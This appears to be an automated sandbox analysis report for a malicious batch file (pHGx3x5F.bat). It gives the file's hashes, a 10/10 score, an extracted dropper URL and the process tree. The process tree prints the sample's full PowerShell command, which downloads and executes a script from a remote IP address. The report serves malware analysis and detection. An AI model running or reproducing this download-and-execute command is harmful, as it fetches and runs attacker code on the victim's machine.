Analysis
-
max time kernel
110s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
04-03-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
pHGx3x5F.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
pHGx3x5F.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
pHGx3x5F.bat
-
Size
189B
-
MD5
f8f2d35ab2ca83ab301ef94c9ca2c356
-
SHA1
9f417af220cfe9c60bad058d139354deb8022607
-
SHA256
c84e4db88d87029f006dc693c049288c87734e72eb1b2157011efcec833b5360
-
SHA512
f35a847580b31883ee57c5762c5805517739d6a2b3b4ea43697518577dddecd2f066fbcb2858d0859ac10d67280ae72bc25d5541a72b7f34469aadd3044378cc
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/pHGx3x5F
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3444 3988 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3444 WerFault.exe Token: SeBackupPrivilege 3444 WerFault.exe Token: SeDebugPrivilege 3444 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe 3444 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pHGx3x5F.bat"1⤵PID:3952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/pHGx3x5F');Invoke-FWRRPX;Start-Sleep -s 10000"2⤵PID:3988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7123⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3444